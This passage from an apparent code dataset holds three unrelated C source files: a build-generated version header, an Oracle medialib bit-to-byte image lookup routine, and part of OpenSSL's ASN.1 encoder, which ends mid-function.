 * 1.27.0.0.  Apparently produced from the epivers.h.in template at
 * build time (see the $Id tag above).
 */

#ifndef _epivers_h_
#define _epivers_h_

/* Individual version components. */
#define EPI_MAJOR_VERSION 1
#define EPI_MINOR_VERSION 27
#define EPI_RC_NUMBER 0
#define EPI_INCREMENTAL_NUMBER 0
#define EPI_BUILD_NUMBER 0

/* The four components as a comma-separated list (for resource-style
 * version records). */
#define EPI_VERSION 1, 27, 0, 0

/* Packed numeric form: one byte per component, most significant first.
 * 0x011b0000 == (1 << 24) | (27 << 16) | (0 << 8) | 0. */
#define EPI_VERSION_NUM 0x011b0000

/* Unquoted dotted form -- not a string literal; only usable through
 * further macro pasting/stringification by the build. */
#define EPI_VERSION_DEV 1.27.0

/* Human-readable version string including the source revision tag. */
#define EPI_VERSION_STR "1.27 (r329705)"

#endif
{ "language": "C" }
/* * Copyright (c) 2003, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 only, as * published by the Free Software Foundation. Oracle designates this * particular file as subject to the "Classpath" exception as provided * by Oracle in the LICENSE file that accompanied this code. * * This code is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License * version 2 for more details (a copy is included in the LICENSE file that * accompanied this code). * * You should have received a copy of the GNU General Public License version * 2 along with this work; if not, write to the Free Software Foundation, * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. * * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA * or visit www.oracle.com if you need additional information or have any * questions. 
*/ /* * FUNCTION * mlib_ImageLookUp_Bit_U8 - table lookup * * SYNOPSIS * void mlib_ImageLookUp_Bit_U8(src, slb, * dst, dlb, * xsize, ysize, * csize, table) * * ARGUMENT * src pointer to input image (BIT) * slb stride of input image (in pixels) * dst pointer to output image (BYTE) * dlb stride of output image (in pixels) * xsize image width * ysize image height * csize number of channels * table lookup table * * DESCRIPTION * dst = table[src] (c, vis version) */ #include "mlib_image.h" #include "mlib_ImageLookUp.h" /***************************************************************/ #define MAX_WIDTH 512 /***************************************************************/ #ifdef i386 /* do not copy by double data type for x86 */ typedef struct { mlib_u32 int0, int1; } two_uint; #define TYPE_64BIT two_uint #define TYPE_32BIT mlib_u32 #define DTYPE two_uint #elif defined(_NO_LONGLONG) #define TYPE_64BIT mlib_d64 #define TYPE_32BIT mlib_f32 #define DTYPE mlib_d64 #else #define TYPE_64BIT mlib_d64 #define TYPE_32BIT mlib_f32 #define DTYPE mlib_u64 #endif /* i386 ( do not copy by double data type for x86 ) */ /***************************************************************/ typedef union { TYPE_64BIT d64; struct { TYPE_32BIT f0, f1; } f32s; } d64_2_f32; /***************************************************************/ #ifdef _LITTLE_ENDIAN static const mlib_u32 mlib_bit_mask[16] = { 0x00000000u, 0xFF000000u, 0x00FF0000u, 0xFFFF0000u, 0x0000FF00u, 0xFF00FF00u, 0x00FFFF00u, 0xFFFFFF00u, 0x000000FFu, 0xFF0000FFu, 0x00FF00FFu, 0xFFFF00FFu, 0x0000FFFFu, 0xFF00FFFFu, 0x00FFFFFFu, 0xFFFFFFFFu }; static const mlib_u32 mlib_bit_mask_2[4] = { 0x00000000u, 0xFFFF0000u, 0x0000FFFFu, 0xFFFFFFFFu }; static const mlib_u32 mlib_bit_mask_3[3*4] = { 0x00000000u, 0xFF000000u, 0x00FFFFFFu, 0xFFFFFFFFu, 0x00000000u, 0xFFFF0000u, 0x0000FFFFu, 0xFFFFFFFFu, 0x00000000u, 0xFFFFFF00u, 0x000000FFu, 0xFFFFFFFFu }; #else static const mlib_u32 mlib_bit_mask[16] = { 0x00000000u, 0x000000FFu, 0x0000FF00u, 
0x0000FFFFu, 0x00FF0000u, 0x00FF00FFu, 0x00FFFF00u, 0x00FFFFFFu, 0xFF000000u, 0xFF0000FFu, 0xFF00FF00u, 0xFF00FFFFu, 0xFFFF0000u, 0xFFFF00FFu, 0xFFFFFF00u, 0xFFFFFFFFu }; static const mlib_u32 mlib_bit_mask_2[4] = { 0x00000000u, 0x0000FFFFu, 0xFFFF0000u, 0xFFFFFFFFu }; static const mlib_u32 mlib_bit_mask_3[3*4] = { 0x00000000u, 0x000000FFu, 0xFFFFFF00u, 0xFFFFFFFFu, 0x00000000u, 0x0000FFFFu, 0xFFFF0000u, 0xFFFFFFFFu, 0x00000000u, 0x00FFFFFFu, 0xFF000000u, 0xFFFFFFFFu }; #endif /* _LITTLE_ENDIAN */ /***************************************************************/ mlib_status mlib_ImageLookUp_Bit_U8_1(const mlib_u8 *src, mlib_s32 slb, mlib_u8 *dst, mlib_s32 dlb, mlib_s32 xsize, mlib_s32 ysize, mlib_s32 nchan, mlib_s32 bitoff, const mlib_u8 **table) { mlib_s32 i, j, n; TYPE_64BIT dd_array[256]; mlib_u8 buff_lcl[MAX_WIDTH/8]; mlib_u8 *buff = (mlib_u8*)buff_lcl; mlib_u32 val0, val1, *p_dd = (mlib_u32*)dd_array; if (xsize > MAX_WIDTH) { buff = mlib_malloc((xsize + 7)/8); if (buff == NULL) return MLIB_FAILURE; } val0 = table[0][0]; val1 = table[0][1]; val0 |= (val0 << 8); val1 |= (val1 << 8); val0 |= (val0 << 16); val1 |= (val1 << 16); /* calculate lookup table */ for (i = 0; i < 16; i++) { mlib_u32 v, mask = mlib_bit_mask[i]; v = (val0 &~ mask) | (val1 & mask); #ifdef __SUNPRO_C #pragma pipeloop(0) #endif /* __SUNPRO_C */ for (j = 0; j < 16; j++) { p_dd[2*(16*i + j)] = v; } #ifdef __SUNPRO_C #pragma pipeloop(0) #endif /* __SUNPRO_C */ for (j = 0; j < 16; j++) { p_dd[2*(i + 16*j) + 1] = v; } } for (j = 0; j < ysize; j++) { mlib_s32 s0, size = xsize; mlib_u8 *dp = dst; mlib_u8 *sp = (void *)src; mlib_u8 *sa; TYPE_64BIT *da; mlib_s32 doff, boff = bitoff; if ((mlib_addr)dp & 7) { /* result of (dp & 7) certainly fits into mlib_s32 */ doff = 8 - ((mlib_s32) ((mlib_addr)dp & 7)); if (doff > xsize) doff = xsize; for (n = 0; n < doff; n++) { dp[n] = table[0][(sp[0] >> (7 - boff)) & 0x1]; boff++; if (boff >= 8) { sp++; boff -= 8; } size--; } dp += doff; } if (boff) { 
mlib_ImageCopy_bit_na(sp, buff, size, boff, 0); sp = buff; } sa = (mlib_u8*)sp; da = (TYPE_64BIT*)dp; i = 0; if ((mlib_addr)sa & 1 && size >= 8) { *da++ = dd_array[*sa++]; i += 8; } #ifdef __SUNPRO_C #pragma pipeloop(0) #endif /* __SUNPRO_C */ for (; i <= (size - 16); i += 16) { s0 = *(mlib_u16*)sa; #ifdef _LITTLE_ENDIAN *da++ = dd_array[s0 & 0xFF]; *da++ = dd_array[s0 >> 8]; #else *da++ = dd_array[s0 >> 8]; *da++ = dd_array[s0 & 0xFF]; #endif /* _LITTLE_ENDIAN */ sa += 2; } if (i <= (size - 8)) { *da++ = dd_array[*sa++]; i += 8; } if (i < size) { #ifdef _NO_LONGLONG mlib_u32 emask; val0 = sa[0]; val1 = p_dd[2*val0]; if (i < (size - 4)) { ((mlib_u32*)da)[0] = val1; da = (TYPE_64BIT *) ((mlib_u8 *)da + 4); i += 4; val1 = p_dd[2*val0+1]; } #ifdef _LITTLE_ENDIAN emask = (mlib_u32)((mlib_s32)(-1)) >> ((4 - (size - i)) * 8); #else emask = (mlib_s32)(-1) << ((4 - (size - i)) * 8); #endif /* _LITTLE_ENDIAN */ ((mlib_u32*)da)[0] = (val1 & emask) | (((mlib_u32*)da)[0] &~ emask); #else /* _NO_LONGLONG */ #ifdef _LITTLE_ENDIAN mlib_u64 emask = (mlib_u64)((mlib_s64)(-1)) >> ((8 - (size - i)) * 8); #else mlib_u64 emask = (mlib_s64)(-1) << ((8 - (size - i)) * 8); #endif /* _LITTLE_ENDIAN */ ((mlib_u64*)da)[0] = (((mlib_u64*)dd_array)[sa[0]] & emask) | (((mlib_u64*)da)[0] &~ emask); #endif /* _NO_LONGLONG */ } src += slb; dst += dlb; } if (buff != (mlib_u8*)buff_lcl) mlib_free(buff); return MLIB_SUCCESS; } /***************************************************************/ mlib_status mlib_ImageLookUp_Bit_U8_2(const mlib_u8 *src, mlib_s32 slb, mlib_u8 *dst, mlib_s32 dlb, mlib_s32 xsize, mlib_s32 ysize, mlib_s32 nchan, mlib_s32 bitoff, const mlib_u8 **table) { mlib_s32 i, j; mlib_s32 s0, size; #ifdef _NO_LONGLONG mlib_u32 emask, dd1, dd2; #else /* _NO_LONGLONG */ mlib_u64 emask, dd; #endif /* _NO_LONGLONG */ DTYPE dd_array[16]; mlib_u32 *p_dd = (mlib_u32*)dd_array; mlib_d64 buff_lcl[(MAX_WIDTH + MAX_WIDTH/8)/8]; mlib_u8 *buff = (mlib_u8*)buff_lcl, *buffs; mlib_u32 val0, val1; size = 
xsize * 2; if (size > MAX_WIDTH) { buff = mlib_malloc(size + (size + 7)/8); if (buff == NULL) return MLIB_FAILURE; } buffs = buff + size; val0 = table[0][0]; val1 = table[0][1]; #ifdef _LITTLE_ENDIAN val0 = val0 | (table[1][0] << 8); val1 = val1 | (table[1][1] << 8); #else val0 = (val0 << 8) | table[1][0]; val1 = (val1 << 8) | table[1][1]; #endif /* _LITTLE_ENDIAN */ val0 |= (val0 << 16); val1 |= (val1 << 16); /* calculate lookup table */ for (i = 0; i < 4; i++) { mlib_u32 v, mask = mlib_bit_mask_2[i]; v = (val0 &~ mask) | (val1 & mask); for (j = 0; j < 4; j++) { p_dd[2*(4*i + j)] = v; p_dd[2*(i + 4*j) + 1] = v; } } for (j = 0; j < ysize; j++) { mlib_u8 *dp = dst; mlib_u8 *sp = (void *)src; mlib_u8 *sa; DTYPE *da; if ((mlib_addr)dp & 7) dp = buff; if (bitoff) { mlib_ImageCopy_bit_na(sp, buffs, size, bitoff, 0); sp = buffs; } sa = (mlib_u8*)sp; da = (DTYPE*)dp; #ifdef __SUNPRO_C #pragma pipeloop(0) #endif /* __SUNPRO_C */ for (i = 0; i <= (size - 16); i += 16) { s0 = *sa++; *da++ = dd_array[s0 >> 4]; *da++ = dd_array[s0 & 0xF]; } if (i < size) { s0 = *sa++; #ifdef _NO_LONGLONG dd1 = p_dd[2*(s0 >> 4)]; dd2 = p_dd[2*(s0 >> 4)+1]; if (i < (size - 8)) { ((mlib_u32*)da)[0] = dd1; ((mlib_u32*)da)[1] = dd2; da++; i += 8; dd1 = p_dd[2*(s0 & 0xf)]; dd2 = p_dd[2*(s0 & 0xf)+1]; } if (i < (size - 4)) { ((mlib_u32*)da)[0] = dd1; da = (DTYPE *) ((mlib_u8 *)da + 4); i += 4; dd1 = dd2; } #ifdef _LITTLE_ENDIAN emask = (mlib_u32)((mlib_s32)(-1)) >> ((4 - (size - i)) * 8); #else emask = (mlib_s32)(-1) << ((4 - (size - i)) * 8); #endif /* _LITTLE_ENDIAN */ ((mlib_u32*)da)[0] = (dd1 & emask) | (((mlib_u32*)da)[0] &~ emask); #else /* _NO_LONGLONG */ dd = ((mlib_u64*)dd_array)[s0 >> 4]; if (i < (size - 8)) { ((mlib_u64*)da)[0] = dd; da++; i += 8; dd = ((mlib_u64*)dd_array)[s0 & 0xf]; } #ifdef _LITTLE_ENDIAN emask = (mlib_u64)((mlib_s64)(-1)) >> ((8 - (size - i)) * 8); #else emask = (mlib_s64)(-1) << ((8 - (size - i)) * 8); #endif /* _LITTLE_ENDIAN */ ((mlib_u64*)da)[0] = (dd & emask) | 
(((mlib_u64*)da)[0] &~ emask); #endif /* _NO_LONGLONG */ } if (dp != dst) mlib_ImageCopy_na(dp, dst, size); src += slb; dst += dlb; } if (buff != (mlib_u8*)buff_lcl) mlib_free(buff); return MLIB_SUCCESS; } /***************************************************************/ mlib_status mlib_ImageLookUp_Bit_U8_3(const mlib_u8 *src, mlib_s32 slb, mlib_u8 *dst, mlib_s32 dlb, mlib_s32 xsize, mlib_s32 ysize, mlib_s32 nchan, mlib_s32 bitoff, const mlib_u8 **table) { mlib_s32 i, j; mlib_s32 s0, size; mlib_u32 emask, dd; TYPE_64BIT d_array01[16], d_array12[16]; TYPE_64BIT buff_lcl[(MAX_WIDTH + MAX_WIDTH/8)/8]; mlib_u8 *buff = (mlib_u8*)buff_lcl, *buffs; mlib_u32 l0, h0, v0, l1, h1, v1, l2, h2, v2; size = 3 * xsize; if (size > MAX_WIDTH) { buff = mlib_malloc(size + (size + 7)/8); if (buff == NULL) return MLIB_FAILURE; } buffs = buff + size; #ifdef _LITTLE_ENDIAN l0 = (table[0][0] << 24) | (table[2][0] << 16) | (table[1][0] << 8) | (table[0][0]); h0 = (table[0][1] << 24) | (table[2][1] << 16) | (table[1][1] << 8) | (table[0][1]); l1 = (l0 >> 8); l1 |= (l1 << 24); h1 = (h0 >> 8); h1 |= (h1 << 24); l2 = (l1 >> 8); l2 |= (l2 << 24); h2 = (h1 >> 8); h2 |= (h2 << 24); #else l0 = (table[0][0] << 24) | (table[1][0] << 16) | (table[2][0] << 8) | (table[0][0]); h0 = (table[0][1] << 24) | (table[1][1] << 16) | (table[2][1] << 8) | (table[0][1]); l1 = (l0 << 8); l1 |= (l1 >> 24); h1 = (h0 << 8); h1 |= (h1 >> 24); l2 = (l1 << 8); l2 |= (l2 >> 24); h2 = (h1 << 8); h2 |= (h2 >> 24); #endif /* _LITTLE_ENDIAN */ /* calculate lookup table */ #ifdef __SUNPRO_C #pragma pipeloop(0) #endif /* __SUNPRO_C */ for (i = 0; i < 16; i++) { mlib_u32 mask0 = mlib_bit_mask_3[i >> 2]; mlib_u32 mask1 = mlib_bit_mask_3[4 + ((i >> 1) & 3)]; mlib_u32 mask2 = mlib_bit_mask_3[8 + (i & 3)]; v0 = (l0 &~ mask0) | (h0 & mask0); v1 = (l1 &~ mask1) | (h1 & mask1); v2 = (l2 &~ mask2) | (h2 & mask2); ((mlib_u32*)d_array01)[2*i ] = v0; ((mlib_u32*)d_array01)[2*i + 1] = v1; ((mlib_u32*)d_array12)[2*i ] = v1; 
((mlib_u32*)d_array12)[2*i + 1] = v2; } for (j = 0; j < ysize; j++) { mlib_u8 *dp = dst; mlib_u8 *sp = (void *)src; mlib_u8 *sa; mlib_u32 *da; if ((mlib_addr)dp & 7) dp = buff; if (bitoff) { mlib_ImageCopy_bit_na(sp, buffs, size, bitoff, 0); sp = buffs; } sa = (mlib_u8*)sp; da = (mlib_u32*)dp; #ifdef __SUNPRO_C #pragma pipeloop(0) #endif /* __SUNPRO_C */ for (i = 0; i <= (size - 24); i += 24) { d64_2_f32 dd; s0 = *sa++; ((TYPE_64BIT*)da)[0] = *(d_array01 + (s0 >> 4)); dd.f32s.f0 = ((TYPE_32BIT*)(d_array12 + (s0 >> 4)))[1]; dd.f32s.f1 = ((TYPE_32BIT*)(d_array01 + (s0 & 0xF)))[0]; ((TYPE_64BIT*)da)[1] = dd.d64; ((TYPE_64BIT*)da)[2] = *(d_array12 + (s0 & 0xF)); da += 6; } if (i < size) { s0 = *sa++; dd = ((mlib_u32*)(d_array01 + (s0 >> 4)))[0]; if (i < (size - 4)) { *da++ = dd; i += 4; dd = ((mlib_u32*)(d_array12 + (s0 >> 4)))[0]; } if (i < (size - 4)) { *da++ = dd; i += 4; dd = ((mlib_u32*)(d_array12 + (s0 >> 4)))[1]; } if (i < (size - 4)) { *da++ = dd; i += 4; dd = ((mlib_u32*)(d_array01 + (s0 & 0xF)))[0]; } if (i < (size - 4)) { *da++ = dd; i += 4; dd = ((mlib_u32*)(d_array12 + (s0 & 0xF)))[0]; } if (i < (size - 4)) { *da++ = dd; i += 4; dd = ((mlib_u32*)(d_array12 + (s0 & 0xF)))[1]; } #ifdef _LITTLE_ENDIAN emask = (mlib_u32)((mlib_s32)(-1)) >> ((4 - (size - i)) * 8); #else emask = (mlib_s32)(-1) << ((4 - (size - i)) * 8); #endif /* _LITTLE_ENDIAN */ da[0] = (dd & emask) | (da[0] &~ emask); } if (dp != dst) mlib_ImageCopy_na(dp, dst, size); src += slb; dst += dlb; } if (buff != (mlib_u8*)buff_lcl) mlib_free(buff); return MLIB_SUCCESS; } /***************************************************************/ mlib_status mlib_ImageLookUp_Bit_U8_4(const mlib_u8 *src, mlib_s32 slb, mlib_u8 *dst, mlib_s32 dlb, mlib_s32 xsize, mlib_s32 ysize, mlib_s32 nchan, mlib_s32 bitoff, const mlib_u8 **table) { mlib_s32 i, j; mlib_s32 s0, size; DTYPE dd_array0[16], dd_array1[16], lh[4], dd; mlib_d64 buff_lcl[(MAX_WIDTH + MAX_WIDTH/8)/8]; mlib_u8 *buff = (mlib_u8*)buff_lcl, *buffs; 
mlib_u32 l, h; size = xsize * 4; if (size > MAX_WIDTH) { buff = mlib_malloc(size + (size + 7)/8); if (buff == NULL) return MLIB_FAILURE; } buffs = buff + size; #ifdef _LITTLE_ENDIAN l = (table[3][0] << 24) | (table[2][0] << 16) | (table[1][0] << 8) | (table[0][0]); h = (table[3][1] << 24) | (table[2][1] << 16) | (table[1][1] << 8) | (table[0][1]); #else l = (table[0][0] << 24) | (table[1][0] << 16) | (table[2][0] << 8) | (table[3][0]); h = (table[0][1] << 24) | (table[1][1] << 16) | (table[2][1] << 8) | (table[3][1]); #endif /* _LITTLE_ENDIAN */ ((mlib_u32*)lh)[0] = l; ((mlib_u32*)lh)[1] = l; ((mlib_u32*)lh)[2] = l; ((mlib_u32*)lh)[3] = h; ((mlib_u32*)lh)[4] = h; ((mlib_u32*)lh)[5] = l; ((mlib_u32*)lh)[6] = h; ((mlib_u32*)lh)[7] = h; /* calculate lookup table */ dd_array0[ 0] = lh[0]; dd_array1[ 0] = lh[0]; dd_array0[ 1] = lh[0]; dd_array1[ 1] = lh[1]; dd_array0[ 2] = lh[0]; dd_array1[ 2] = lh[2]; dd_array0[ 3] = lh[0]; dd_array1[ 3] = lh[3]; dd_array0[ 4] = lh[1]; dd_array1[ 4] = lh[0]; dd_array0[ 5] = lh[1]; dd_array1[ 5] = lh[1]; dd_array0[ 6] = lh[1]; dd_array1[ 6] = lh[2]; dd_array0[ 7] = lh[1]; dd_array1[ 7] = lh[3]; dd_array0[ 8] = lh[2]; dd_array1[ 8] = lh[0]; dd_array0[ 9] = lh[2]; dd_array1[ 9] = lh[1]; dd_array0[10] = lh[2]; dd_array1[10] = lh[2]; dd_array0[11] = lh[2]; dd_array1[11] = lh[3]; dd_array0[12] = lh[3]; dd_array1[12] = lh[0]; dd_array0[13] = lh[3]; dd_array1[13] = lh[1]; dd_array0[14] = lh[3]; dd_array1[14] = lh[2]; dd_array0[15] = lh[3]; dd_array1[15] = lh[3]; for (j = 0; j < ysize; j++) { mlib_u8 *dp = dst; mlib_u8 *sp = (void *)src; mlib_u8 *sa; DTYPE *da; if ((mlib_addr)dp & 7) dp = buff; if (bitoff) { mlib_ImageCopy_bit_na(sp, buffs, size, bitoff, 0); sp = buffs; } sa = (mlib_u8*)sp; da = (DTYPE*)dp; #ifdef __SUNPRO_C #pragma pipeloop(0) #endif /* __SUNPRO_C */ for (i = 0; i <= (size - 32); i += 32) { s0 = *sa++; *da++ = dd_array0[s0 >> 4]; *da++ = dd_array1[s0 >> 4]; *da++ = dd_array0[s0 & 0xF]; *da++ = dd_array1[s0 & 0xF]; } if (i < 
size) {
      /* Tail: fewer than 32 output bytes remain in this row; expand the
       * last source byte one 8-byte (one nibble-table entry) chunk at a
       * time instead of the unrolled 32-byte main-loop step. */
      s0 = *sa++;
      dd = dd_array0[s0 >> 4];

      if (i <= (size - 8)) {
        *da++ = dd;
        i += 8;
        dd = dd_array1[s0 >> 4];
      }

      if (i <= (size - 8)) {
        *da++ = dd;
        i += 8;
        dd = dd_array0[s0 & 0xF];
      }

      if (i <= (size - 8)) {
        *da++ = dd;
        i += 8;
        dd = dd_array1[s0 & 0xF];
      }

      /* Final partial store: write only the low 32 bits of dd.
       * NOTE(review): assumes the leftover count here is exactly 4 bytes
       * (size = 4 * xsize is always a multiple of 4) — TODO confirm. */
      if (i < size) {
        *(mlib_u32*)da = *(mlib_u32*) & dd;
      }
    }

    /* If dst was not 8-byte aligned the row was rendered into the
     * bounce buffer; copy it to the real destination now. */
    if (dp != dst)
      mlib_ImageCopy_na(dp, dst, size);

    src += slb;
    dst += dlb;
  }

  /* Free the heap buffer only if the stack-local one was too small. */
  if (buff != (mlib_u8*)buff_lcl)
    mlib_free(buff);

  return MLIB_SUCCESS;
}

/***************************************************************/
{ "language": "C" }
/* * Copyright 2000-2018 The OpenSSL Project Authors. All Rights Reserved. * * Licensed under the OpenSSL license (the "License"). You may not use * this file except in compliance with the License. You can obtain a copy * in the file LICENSE in the source distribution or at * https://www.openssl.org/source/license.html */ #include <stddef.h> #include <string.h> #include "internal/cryptlib.h" #include <openssl/asn1.h> #include <openssl/asn1t.h> #include <openssl/objects.h> #include "internal/asn1_int.h" #include "asn1_locl.h" static int asn1_i2d_ex_primitive(ASN1_VALUE **pval, unsigned char **out, const ASN1_ITEM *it, int tag, int aclass); static int asn1_set_seq_out(STACK_OF(ASN1_VALUE) *sk, unsigned char **out, int skcontlen, const ASN1_ITEM *item, int do_sort, int iclass); static int asn1_template_ex_i2d(ASN1_VALUE **pval, unsigned char **out, const ASN1_TEMPLATE *tt, int tag, int aclass); static int asn1_item_flags_i2d(ASN1_VALUE *val, unsigned char **out, const ASN1_ITEM *it, int flags); static int asn1_ex_i2c(ASN1_VALUE **pval, unsigned char *cout, int *putype, const ASN1_ITEM *it); /* * Top level i2d equivalents: the 'ndef' variant instructs the encoder to use * indefinite length constructed encoding, where appropriate */ int ASN1_item_ndef_i2d(ASN1_VALUE *val, unsigned char **out, const ASN1_ITEM *it) { return asn1_item_flags_i2d(val, out, it, ASN1_TFLG_NDEF); } int ASN1_item_i2d(ASN1_VALUE *val, unsigned char **out, const ASN1_ITEM *it) { return asn1_item_flags_i2d(val, out, it, 0); } /* * Encode an ASN1 item, this is use by the standard 'i2d' function. 'out' * points to a buffer to output the data to. The new i2d has one additional * feature. If the output buffer is NULL (i.e. *out == NULL) then a buffer is * allocated and populated with the encoding. 
*/ static int asn1_item_flags_i2d(ASN1_VALUE *val, unsigned char **out, const ASN1_ITEM *it, int flags) { if (out && !*out) { unsigned char *p, *buf; int len; len = ASN1_item_ex_i2d(&val, NULL, it, -1, flags); if (len <= 0) return len; if ((buf = OPENSSL_malloc(len)) == NULL) { ASN1err(ASN1_F_ASN1_ITEM_FLAGS_I2D, ERR_R_MALLOC_FAILURE); return -1; } p = buf; ASN1_item_ex_i2d(&val, &p, it, -1, flags); *out = buf; return len; } return ASN1_item_ex_i2d(&val, out, it, -1, flags); } /* * Encode an item, taking care of IMPLICIT tagging (if any). This function * performs the normal item handling: it can be used in external types. */ int ASN1_item_ex_i2d(ASN1_VALUE **pval, unsigned char **out, const ASN1_ITEM *it, int tag, int aclass) { const ASN1_TEMPLATE *tt = NULL; int i, seqcontlen, seqlen, ndef = 1; const ASN1_EXTERN_FUNCS *ef; const ASN1_AUX *aux = it->funcs; ASN1_aux_cb *asn1_cb = 0; if ((it->itype != ASN1_ITYPE_PRIMITIVE) && !*pval) return 0; if (aux && aux->asn1_cb) asn1_cb = aux->asn1_cb; switch (it->itype) { case ASN1_ITYPE_PRIMITIVE: if (it->templates) return asn1_template_ex_i2d(pval, out, it->templates, tag, aclass); return asn1_i2d_ex_primitive(pval, out, it, tag, aclass); case ASN1_ITYPE_MSTRING: return asn1_i2d_ex_primitive(pval, out, it, -1, aclass); case ASN1_ITYPE_CHOICE: if (asn1_cb && !asn1_cb(ASN1_OP_I2D_PRE, pval, it, NULL)) return 0; i = asn1_get_choice_selector(pval, it); if ((i >= 0) && (i < it->tcount)) { ASN1_VALUE **pchval; const ASN1_TEMPLATE *chtt; chtt = it->templates + i; pchval = asn1_get_field_ptr(pval, chtt); return asn1_template_ex_i2d(pchval, out, chtt, -1, aclass); } /* Fixme: error condition if selector out of range */ if (asn1_cb && !asn1_cb(ASN1_OP_I2D_POST, pval, it, NULL)) return 0; break; case ASN1_ITYPE_EXTERN: /* If new style i2d it does all the work */ ef = it->funcs; return ef->asn1_ex_i2d(pval, out, it, tag, aclass); case ASN1_ITYPE_NDEF_SEQUENCE: /* Use indefinite length constructed if requested */ if (aclass & 
ASN1_TFLG_NDEF) ndef = 2; /* fall through */ case ASN1_ITYPE_SEQUENCE: i = asn1_enc_restore(&seqcontlen, out, pval, it); /* An error occurred */ if (i < 0) return 0; /* We have a valid cached encoding... */ if (i > 0) return seqcontlen; /* Otherwise carry on */ seqcontlen = 0; /* If no IMPLICIT tagging set to SEQUENCE, UNIVERSAL */ if (tag == -1) { tag = V_ASN1_SEQUENCE; /* Retain any other flags in aclass */ aclass = (aclass & ~ASN1_TFLG_TAG_CLASS) | V_ASN1_UNIVERSAL; } if (asn1_cb && !asn1_cb(ASN1_OP_I2D_PRE, pval, it, NULL)) return 0; /* First work out sequence content length */ for (i = 0, tt = it->templates; i < it->tcount; tt++, i++) { const ASN1_TEMPLATE *seqtt; ASN1_VALUE **pseqval; int tmplen; seqtt = asn1_do_adb(pval, tt, 1); if (!seqtt) return 0; pseqval = asn1_get_field_ptr(pval, seqtt); tmplen = asn1_template_ex_i2d(pseqval, NULL, seqtt, -1, aclass); if (tmplen == -1 || (tmplen > INT_MAX - seqcontlen)) return -1; seqcontlen += tmplen; } seqlen = ASN1_object_size(ndef, seqcontlen, tag); if (!out || seqlen == -1) return seqlen; /* Output SEQUENCE header */ ASN1_put_object(out, ndef, seqcontlen, tag, aclass); for (i = 0, tt = it->templates; i < it->tcount; tt++, i++) { const ASN1_TEMPLATE *seqtt; ASN1_VALUE **pseqval; seqtt = asn1_do_adb(pval, tt, 1); if (!seqtt) return 0; pseqval = asn1_get_field_ptr(pval, seqtt); /* FIXME: check for errors in enhanced version */ asn1_template_ex_i2d(pseqval, out, seqtt, -1, aclass); } if (ndef == 2) ASN1_put_eoc(out); if (asn1_cb && !asn1_cb(ASN1_OP_I2D_POST, pval, it, NULL)) return 0; return seqlen; default: return 0; } return 0; } static int asn1_template_ex_i2d(ASN1_VALUE **pval, unsigned char **out, const ASN1_TEMPLATE *tt, int tag, int iclass) { int i, ret, flags, ttag, tclass, ndef; ASN1_VALUE *tval; flags = tt->flags; /* * If field is embedded then val needs fixing so it is a pointer to * a pointer to a field. 
*/ if (flags & ASN1_TFLG_EMBED) { tval = (ASN1_VALUE *)pval; pval = &tval; } /* * Work out tag and class to use: tagging may come either from the * template or the arguments, not both because this would create * ambiguity. Additionally the iclass argument may contain some * additional flags which should be noted and passed down to other * levels. */ if (flags & ASN1_TFLG_TAG_MASK) { /* Error if argument and template tagging */ if (tag != -1) /* FIXME: error code here */ return -1; /* Get tagging from template */ ttag = tt->tag; tclass = flags & ASN1_TFLG_TAG_CLASS; } else if (tag != -1) { /* No template tagging, get from arguments */ ttag = tag; tclass = iclass & ASN1_TFLG_TAG_CLASS; } else { ttag = -1; tclass = 0; } /* * Remove any class mask from iflag. */ iclass &= ~ASN1_TFLG_TAG_CLASS; /* * At this point 'ttag' contains the outer tag to use, 'tclass' is the * class and iclass is any flags passed to this function. */ /* if template and arguments require ndef, use it */ if ((flags & ASN1_TFLG_NDEF) && (iclass & ASN1_TFLG_NDEF)) ndef = 2; else ndef = 1; if (flags & ASN1_TFLG_SK_MASK) { /* SET OF, SEQUENCE OF */ STACK_OF(ASN1_VALUE) *sk = (STACK_OF(ASN1_VALUE) *)*pval; int isset, sktag, skaclass; int skcontlen, sklen; ASN1_VALUE *skitem; if (!*pval) return 0; if (flags & ASN1_TFLG_SET_OF) { isset = 1; /* 2 means we reorder */ if (flags & ASN1_TFLG_SEQUENCE_OF) isset = 2; } else isset = 0; /* * Work out inner tag value: if EXPLICIT or no tagging use underlying * type. 
*/ if ((ttag != -1) && !(flags & ASN1_TFLG_EXPTAG)) { sktag = ttag; skaclass = tclass; } else { skaclass = V_ASN1_UNIVERSAL; if (isset) sktag = V_ASN1_SET; else sktag = V_ASN1_SEQUENCE; } /* Determine total length of items */ skcontlen = 0; for (i = 0; i < sk_ASN1_VALUE_num(sk); i++) { int tmplen; skitem = sk_ASN1_VALUE_value(sk, i); tmplen = ASN1_item_ex_i2d(&skitem, NULL, ASN1_ITEM_ptr(tt->item), -1, iclass); if (tmplen == -1 || (skcontlen > INT_MAX - tmplen)) return -1; skcontlen += tmplen; } sklen = ASN1_object_size(ndef, skcontlen, sktag); if (sklen == -1) return -1; /* If EXPLICIT need length of surrounding tag */ if (flags & ASN1_TFLG_EXPTAG) ret = ASN1_object_size(ndef, sklen, ttag); else ret = sklen; if (!out || ret == -1) return ret; /* Now encode this lot... */ /* EXPLICIT tag */ if (flags & ASN1_TFLG_EXPTAG) ASN1_put_object(out, ndef, sklen, ttag, tclass); /* SET or SEQUENCE and IMPLICIT tag */ ASN1_put_object(out, ndef, skcontlen, sktag, skaclass); /* And the stuff itself */ asn1_set_seq_out(sk, out, skcontlen, ASN1_ITEM_ptr(tt->item), isset, iclass); if (ndef == 2) { ASN1_put_eoc(out); if (flags & ASN1_TFLG_EXPTAG) ASN1_put_eoc(out); } return ret; } if (flags & ASN1_TFLG_EXPTAG) { /* EXPLICIT tagging */ /* Find length of tagged item */ i = ASN1_item_ex_i2d(pval, NULL, ASN1_ITEM_ptr(tt->item), -1, iclass); if (!i) return 0; /* Find length of EXPLICIT tag */ ret = ASN1_object_size(ndef, i, ttag); if (out && ret != -1) { /* Output tag and item */ ASN1_put_object(out, ndef, i, ttag, tclass); ASN1_item_ex_i2d(pval, out, ASN1_ITEM_ptr(tt->item), -1, 